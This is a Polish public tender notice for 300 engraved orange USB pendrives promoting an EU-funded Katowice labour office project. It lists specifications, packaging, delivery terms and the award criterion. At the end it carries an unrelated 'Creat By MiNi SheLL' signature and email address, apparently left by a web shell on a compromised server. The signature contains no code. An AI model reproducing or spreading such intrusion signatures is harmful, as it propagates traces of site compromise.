<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa gadżetów wraz z nadrukiem- pendrive- promujących projekt realizowany przez  Wojewódzki Urząd Pracy w Katowicach  Rozmawiajmy! - dialog społeczny, jako skuteczna forma rozwiązywania problemów rynku pracy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II :
1.	Pendrive - szt. 300   
Pendrive USB 4 GB - obudowa aluminiowa w kolorze pomarańczowym, zamykana, wraz z dopinaną smyczą (jednokolorową). Gwarancja 24 miesiące, pojemność: 4 GB, obsługiwany typ złącz - USB 2.0, kompatybilne z Windows 9x, Millenium, XP, Media Center oraz Vista, zgodny z USB 2.0 Hi-Speed, kompatybliny z USB 1.1, Plug and Play. Rozmiar od 58 mm do 90 mm(+/- 5%), szerokość maksimum 25 mm, grubość od 7 mm do 12 mm(+/- 5%). Waga 9g(+/- 5%). Rozmiar graweru 40mm x 15mm(+/- 5%). Nadruk w technice graweru laserowego - po jednej stronie logo Programu Operacyjnego Kapitał Ludzki, na drugiej stronie korpusu logo Unii Europejskiej z podpisem -Unia Europejska Europejski Fundusz Społeczny-. Każdy pendrive zapakowany w osobnym kartonowym pudełku koloru czarnego opatrzonym logotypami: Programu Operacyjnego Kapitał Ludzki i flagi Unii Europejskiej z podpisem -Unia Europejska Europejski Fundusz Społeczny-, -Śląskie. Pozytywna energia- oraz adres strony projektu (wykonane w technice trwałej). Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu.
Uwagi ogólne:

-  Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu. 
- Wykonawca dostarczy (dostawa jednorazowa) gadżety wraz z nadrukiem do siedziby Zamawiającego w terminie 21 dni od dnia zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com